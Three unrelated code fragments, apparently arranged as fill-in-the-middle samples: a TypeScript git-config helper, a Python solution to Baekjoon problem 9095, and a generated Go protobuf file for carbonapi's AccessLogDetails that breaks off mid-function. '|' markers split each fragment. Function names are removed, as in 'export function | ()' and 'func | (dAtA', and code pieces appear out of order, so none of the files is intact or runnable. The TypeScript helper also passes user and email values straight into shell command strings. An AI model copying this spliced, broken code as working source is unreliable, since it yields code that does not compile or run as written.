return shell.run('git config user.name', { capture: true });
} catch (err) {
console.warn(err.message);
return undefined;
}
}
/**
* Fetch the configured git user email for the current directory.
* Returns undefined if not configured.
*/
export function | () {
try {
return shell.run('git config user.email', { capture: true });
} catch (err) {
console.warn(err.message);
return undefined;
}
}
/**
* Identify the committer with a username and email.
*
* @param user the username.
* @param email the email address.
*/
export function identify(user: string, address: string) {
shell.run(`git config user.name "${user}"`);
shell.run(`git config user.email "${address}"`);
} | email |
ex9095.py | # BOJ 1,2,3 더하기 9095
T = int(input()) # 테스트 케이스의 개수 T가 주어짐
sum_list = []
for i in range(T):
n = int(input())
sum_list.append(n)
def oneTwoThreeSum(n):
if n == 1:
return 1
| oneTwoThreeSum(k))
| if n == 2:
return 2
if n == 3:
return 4
else:
return oneTwoThreeSum(n-3) + oneTwoThreeSum(n-2) + oneTwoThreeSum(n-1)
for k in sum_list:
print( |
carbonapi.pb.go | // Code generated by protoc-gen-gogo.
// source: carbonapi.proto
// DO NOT EDIT!
/*
Package carbonapipb is a generated protocol buffer package.
It is generated from these files:
carbonapi.proto
It has these top-level messages:
AccessLogDetails
*/
package carbonapipb
import proto "github.com/gogo/protobuf/proto"
import fmt "fmt"
import math "math"
import io "io"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
type AccessLogDetails struct {
Handler string `protobuf:"bytes,1,opt,name=handler,proto3" json:"handler,omitempty"`
CarbonapiUuid string `protobuf:"bytes,2,opt,name=carbonapi_uuid,json=carbonapiUuid,proto3" json:"carbonapi_uuid,omitempty"`
Username string `protobuf:"bytes,3,opt,name=username,proto3" json:"username,omitempty"`
Url string `protobuf:"bytes,4,opt,name=url,proto3" json:"url,omitempty"`
PeerIp string `protobuf:"bytes,5,opt,name=peer_ip,json=peerIp,proto3" json:"peer_ip,omitempty"`
PeerPort string `protobuf:"bytes,6,opt,name=peer_port,json=peerPort,proto3" json:"peer_port,omitempty"`
Host string `protobuf:"bytes,7,opt,name=host,proto3" json:"host,omitempty"`
Referer string `protobuf:"bytes,8,opt,name=referer,proto3" json:"referer,omitempty"`
Format string `protobuf:"bytes,9,opt,name=format,proto3" json:"format,omitempty"`
UseCache bool `protobuf:"varint,10,opt,name=use_cache,json=useCache,proto3" json:"use_cache,omitempty"`
Targets []string `protobuf:"bytes,11,rep,name=targets" json:"targets,omitempty"`
CacheTimeout int32 `protobuf:"varint,12,opt,name=cache_timeout,json=cacheTimeout,proto3" json:"cache_timeout,omitempty"`
Metrics []string `protobuf:"bytes,13,rep,name=metrics" json:"metrics,omitempty"`
HaveNonFatalErrors bool `protobuf:"varint,14,opt,name=have_non_fatal_errors,json=haveNonFatalErrors,proto3" json:"have_non_fatal_errors,omitempty"`
Runtime float64 `protobuf:"fixed64,15,opt,name=runtime,proto3" json:"runtime,omitempty"`
HttpCode int32 `protobuf:"varint,16,opt,name=http_code,json=httpCode,proto3" json:"http_code,omitempty"`
CarbonzipperResponseSizeBytes int64 `protobuf:"varint,17,opt,name=carbonzipper_response_size_bytes,json=carbonzipperResponseSizeBytes,proto3" json:"carbonzipper_response_size_bytes,omitempty"`
CarbonapiResponseSizeBytes int64 `protobuf:"varint,18,opt,name=carbonapi_response_size_bytes,json=carbonapiResponseSizeBytes,proto3" json:"carbonapi_response_size_bytes,omitempty"`
Reason string `protobuf:"bytes,19,opt,name=reason,proto3" json:"reason,omitempty"`
SendGlobs bool `protobuf:"varint,20,opt,name=send_globs,json=sendGlobs,proto3" json:"send_globs,omitempty"`
From int32 `protobuf:"varint,21,opt,name=from,proto3" json:"from,omitempty"`
Until int32 `protobuf:"varint,22,opt,name=until,proto3" json:"until,omitempty"`
Tz string `protobuf:"bytes,23,opt,name=tz,proto3" json:"tz,omitempty"`
FromRaw string `protobuf:"bytes,24,opt,name=from_raw,json=fromRaw,proto3" json:"from_raw,omitempty"`
UntilRaw string `protobuf:"bytes,25,opt,name=until_raw,json=untilRaw,proto3" json:"until_raw,omitempty"`
Uri string `protobuf:"bytes,26,opt,name=uri,proto3" json:"uri,omitempty"`
FromCache bool `protobuf:"varint,27,opt,name=from_cache,json=fromCache,proto3" json:"from_cache,omitempty"`
ZipperRequests int64 `protobuf:"varint,28,opt,name=zipper_requests,json=zipperRequests,proto3" json:"zipper_requests,omitempty"`
}
func (m *AccessLogDetails) Reset() { *m = AccessLogDetails{} }
func (m *AccessLogDetails) String() string { return proto.CompactTextString(m) }
func (*AccessLogDetails) ProtoMessage() {}
func (*AccessLogDetails) Descriptor() ([]byte, []int) { return fileDescriptorCarbonapi, []int{0} }
func (m *AccessLogDetails) GetHandler() string {
if m != nil {
return m.Handler
}
return ""
}
func (m *AccessLogDetails) GetCarbonapiUuid() string {
if m != nil {
return m.CarbonapiUuid
}
return ""
}
func (m *AccessLogDetails) GetUsername() string {
if m != nil {
return m.Username
}
return ""
}
func (m *AccessLogDetails) GetUrl() string {
if m != nil {
return m.Url
}
return ""
}
func (m *AccessLogDetails) GetPeerIp() string {
if m != nil {
return m.PeerIp
}
return ""
}
func (m *AccessLogDetails) GetPeerPort() string {
if m != nil {
return m.PeerPort
}
return ""
}
func (m *AccessLogDetails) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AccessLogDetails) GetReferer() string {
if m != nil {
return m.Referer
}
return ""
}
func (m *AccessLogDetails) GetFormat() string {
if m != nil {
return m.Format
}
return ""
}
func (m *AccessLogDetails) GetUseCache() bool {
if m != nil {
return m.UseCache
}
return false
}
func (m *AccessLogDetails) GetTargets() []string {
if m != nil {
return m.Targets
}
return nil
}
func (m *AccessLogDetails) GetCacheTimeout() int32 {
if m != nil {
return m.CacheTimeout
}
return 0
}
func (m *AccessLogDetails) GetMetrics() []string {
if m != nil {
return m.Metrics
}
return nil
}
func (m *AccessLogDetails) GetHaveNonFatalErrors() bool {
if m != nil {
return m.HaveNonFatalErrors
}
return false
}
func (m *AccessLogDetails) GetRuntime() float64 {
if m != nil {
return m.Runtime
}
return 0
}
func (m *AccessLogDetails) GetHttpCode() int32 {
if m != nil {
return m.HttpCode
}
return 0
}
func (m *AccessLogDetails) GetCarbonzipperResponseSizeBytes() int64 {
if m != nil {
return m.CarbonzipperResponseSizeBytes
}
return 0
}
func (m *AccessLogDetails) GetCarbonapiResponseSizeBytes() int64 {
if m != nil {
return m.CarbonapiResponseSizeBytes
}
return 0
}
func (m *AccessLogDetails) GetReason() string {
if m != nil {
return m.Reason
}
return ""
}
func (m *AccessLogDetails) GetSendGlobs() bool {
if m != nil {
return m.SendGlobs
}
return false
}
func (m *AccessLogDetails) GetFrom() int32 {
if m != nil {
return m.From
}
return 0
}
func (m *AccessLogDetails) GetUntil() int32 {
if m != nil {
return m.Until
}
return 0
}
func (m *AccessLogDetails) GetTz() string {
if m != nil {
return m.Tz
}
return ""
}
func (m *AccessLogDetails) GetFromRaw() string {
if m != nil {
return m.FromRaw
}
return ""
}
func (m *AccessLogDetails) GetUntilRaw() string {
if m != nil {
return m.UntilRaw
}
return ""
}
func (m *AccessLogDetails) GetUri() string {
if m != nil {
return m.Uri
}
return ""
}
func (m *AccessLogDetails) GetFromCache() bool {
if m != nil {
return m.FromCache
}
return false
}
func (m *AccessLogDetails) GetZipperRequests() int64 {
if m != nil {
return m.ZipperRequests
}
return 0
}
func init() {
proto.RegisterType((*AccessLogDetails)(nil), "carbonapipb.AccessLogDetails")
}
func (m *AccessLogDetails) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *AccessLogDetails) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Handler) > 0 {
dAtA[i] = 0xa
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Handler)))
i += copy(dAtA[i:], m.Handler)
}
if len(m.CarbonapiUuid) > 0 {
dAtA[i] = 0x12
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.CarbonapiUuid)))
i += copy(dAtA[i:], m.CarbonapiUuid)
}
if len(m.Username) > 0 {
dAtA[i] = 0x1a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Username)))
i += copy(dAtA[i:], m.Username)
}
if len(m.Url) > 0 {
dAtA[i] = 0x22
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Url)))
i += copy(dAtA[i:], m.Url)
}
if len(m.PeerIp) > 0 {
dAtA[i] = 0x2a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.PeerIp)))
i += copy(dAtA[i:], m.PeerIp)
}
if len(m.PeerPort) > 0 {
dAtA[i] = 0x32
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.PeerPort)))
i += copy(dAtA[i:], m.PeerPort)
}
if len(m.Host) > 0 {
dAtA[i] = 0x3a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Host)))
i += copy(dAtA[i:], m.Host)
}
if len(m.Referer) > 0 {
dAtA[i] = 0x42
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Referer)))
i += copy(dAtA[i:], m.Referer)
}
if len(m.Format) > 0 {
dAtA[i] = 0x4a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Format)))
i += copy(dAtA[i:], m.Format)
}
if m.UseCache {
dAtA[i] = 0x50
i++
if m.UseCache {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if len(m.Targets) > 0 {
for _, s := range m.Targets {
dAtA[i] = 0x5a
i++
l = len(s)
for l >= 1<<7 {
dAtA[i] = uint8(uint64(l)&0x7f | 0x80)
l >>= 7
i++
}
dAtA[i] = uint8(l)
i++
i += copy(dAtA[i:], s)
}
}
if m.CacheTimeout != 0 {
dAtA[i] = 0x60
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CacheTimeout))
}
if len(m.Metrics) > 0 {
for _, s := range m.Metrics {
dAtA[i] = 0x6a
i++
l = len(s)
for l >= 1<<7 {
dAtA[i] = uint8(uint64(l)&0x7f | 0x80)
l >>= 7
i++
}
dAtA[i] = uint8(l)
i++
i += copy(dAtA[i:], s)
}
}
if m.HaveNonFatalErrors {
dAtA[i] = 0x70
i++
if m.HaveNonFatalErrors {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.Runtime != 0 {
dAtA[i] = 0x79
i++
i = encodeFixed64Carbonapi(dAtA, i, uint64(math.Float64bits(float64(m.Runtime))))
}
if m.HttpCode != 0 {
dAtA[i] = 0x80
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.HttpCode))
}
if m.CarbonzipperResponseSizeBytes != 0 {
dAtA[i] = 0x88
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CarbonzipperResponseSizeBytes))
}
if m.CarbonapiResponseSizeBytes != 0 {
dAtA[i] = 0x90
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CarbonapiResponseSizeBytes))
}
if len(m.Reason) > 0 {
dAtA[i] = 0x9a
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Reason)))
i += copy(dAtA[i:], m.Reason)
}
if m.SendGlobs {
dAtA[i] = 0xa0
i++
dAtA[i] = 0x1
i++
if m.SendGlobs {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.From != 0 {
dAtA[i] = 0xa8
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.From))
}
if m.Until != 0 {
dAtA[i] = 0xb0
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.Until))
}
if len(m.Tz) > 0 {
dAtA[i] = 0xba
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Tz)))
i += copy(dAtA[i:], m.Tz)
}
if len(m.FromRaw) > 0 {
dAtA[i] = 0xc2
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.FromRaw)))
i += copy(dAtA[i:], m.FromRaw)
}
if len(m.UntilRaw) > 0 {
dAtA[i] = 0xca
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.UntilRaw)))
i += copy(dAtA[i:], m.UntilRaw)
}
if len(m.Uri) > 0 {
dAtA[i] = 0xd2
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Uri)))
i += copy(dAtA[i:], m.Uri)
}
if m.FromCache {
dAtA[i] = 0xd8
i++
dAtA[i] = 0x1
i++
if m.FromCache {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.ZipperRequests != 0 {
dAtA[i] = 0xe0
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.ZipperRequests))
}
return i, nil
}
func | (dAtA []byte, offset int, v uint64) int {
dAtA[offset] = uint8(v)
dAtA[offset+1] = uint8(v >> 8)
dAtA[offset+2] = uint8(v >> 16)
dAtA[offset+3] = uint8(v >> 24)
dAtA[offset+4] = uint8(v >> 32)
dAtA[offset+5] = uint8(v >> 40)
dAtA[offset+6] = uint8(v >> 48)
dAtA[offset+7] = uint8(v >> 56)
return offset + 8
}
func encodeFixed32Carbonapi(dAtA []byte, offset int, v uint32) int {
dAtA[offset] = uint8(v)
dAtA[offset+1] = uint8(v >> 8)
dAtA[offset+2] = uint8(v >> 16)
dAtA[offset+3] = uint8(v >> 24)
return offset + 4
}
func encodeVarintCarbonapi(dAtA []byte, offset int, v uint64) int {
for v >= 1<<7 {
dAtA[offset] = uint8(v&0x7f | 0x80)
v >>= 7
offset++
}
dAtA[offset] = uint8(v)
return offset + 1
}
func (m *AccessLogDetails) Size() (n int) {
var l int
_ = l
l = len(m.Handler)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.CarbonapiUuid)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Username)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Url)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.PeerIp)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.PeerPort)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Host)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Referer)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Format)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
if m.UseCache {
n += 2
}
if len(m.Targets) > 0 {
for _, s := range m.Targets {
l = len(s)
n += 1 + l + sovCarbonapi(uint64(l))
}
}
if m.CacheTimeout != 0 {
n += 1 + sovCarbonapi(uint64(m.CacheTimeout))
}
if len(m.Metrics) > 0 {
for _, s := range m.Metrics {
l = len(s)
n += 1 + l + sovCarbonapi(uint64(l))
}
}
if m.HaveNonFatalErrors {
n += 2
}
if m.Runtime != 0 {
n += 9
}
if m.HttpCode != 0 {
n += 2 + sovCarbonapi(uint64(m.HttpCode))
}
if m.CarbonzipperResponseSizeBytes != 0 {
n += 2 + sovCarbonapi(uint64(m.CarbonzipperResponseSizeBytes))
}
if m.CarbonapiResponseSizeBytes != 0 {
n += 2 + sovCarbonapi(uint64(m.CarbonapiResponseSizeBytes))
}
l = len(m.Reason)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
if m.SendGlobs {
n += 3
}
if m.From != 0 {
n += 2 + sovCarbonapi(uint64(m.From))
}
if m.Until != 0 {
n += 2 + sovCarbonapi(uint64(m.Until))
}
l = len(m.Tz)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.FromRaw)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.UntilRaw)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.Uri)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
if m.FromCache {
n += 3
}
if m.ZipperRequests != 0 {
n += 2 + sovCarbonapi(uint64(m.ZipperRequests))
}
return n
}
func sovCarbonapi(x uint64) (n int) {
for {
n++
x >>= 7
if x == 0 {
break
}
}
return n
}
func sozCarbonapi(x uint64) (n int) {
return sovCarbonapi(uint64((x << 1) ^ uint64((int64(x) >> 63))))
}
func (m *AccessLogDetails) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: AccessLogDetails: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: AccessLogDetails: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Handler", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Handler = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 2:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonapiUuid", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.CarbonapiUuid = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 3:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Username", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Username = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 4:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Url", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Url = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 5:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field PeerIp", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.PeerIp = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 6:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field PeerPort", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.PeerPort = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 7:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Host", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Host = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 8:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Referer", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Referer = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 9:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Format", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Format = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 10:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field UseCache", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.UseCache = bool(v != 0)
case 11:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Targets", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Targets = append(m.Targets, string(dAtA[iNdEx:postIndex]))
iNdEx = postIndex
case 12:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CacheTimeout", wireType)
}
m.CacheTimeout = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CacheTimeout |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 13:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Metrics", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Metrics = append(m.Metrics, string(dAtA[iNdEx:postIndex]))
iNdEx = postIndex
case 14:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field HaveNonFatalErrors", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.HaveNonFatalErrors = bool(v != 0)
case 15:
if wireType != 1 {
return fmt.Errorf("proto: wrong wireType = %d for field Runtime", wireType)
}
var v uint64
if (iNdEx + 8) > l {
return io.ErrUnexpectedEOF
}
iNdEx += 8
v = uint64(dAtA[iNdEx-8])
v |= uint64(dAtA[iNdEx-7]) << 8
v |= uint64(dAtA[iNdEx-6]) << 16
v |= uint64(dAtA[iNdEx-5]) << 24
v |= uint64(dAtA[iNdEx-4]) << 32
v |= uint64(dAtA[iNdEx-3]) << 40
v |= uint64(dAtA[iNdEx-2]) << 48
v |= uint64(dAtA[iNdEx-1]) << 56
m.Runtime = float64(math.Float64frombits(v))
case 16:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field HttpCode", wireType)
}
m.HttpCode = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.HttpCode |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 17:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonzipperResponseSizeBytes", wireType)
}
m.CarbonzipperResponseSizeBytes = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CarbonzipperResponseSizeBytes |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 18:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonapiResponseSizeBytes", wireType)
}
m.CarbonapiResponseSizeBytes = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.CarbonapiResponseSizeBytes |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 19:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Reason", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Reason = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 20:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field SendGlobs", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.SendGlobs = bool(v != 0)
case 21:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field From", wireType)
}
m.From = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.From |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 22:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field Until", wireType)
}
m.Until = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.Until |= (int32(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
case 23:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Tz", wireType)
}
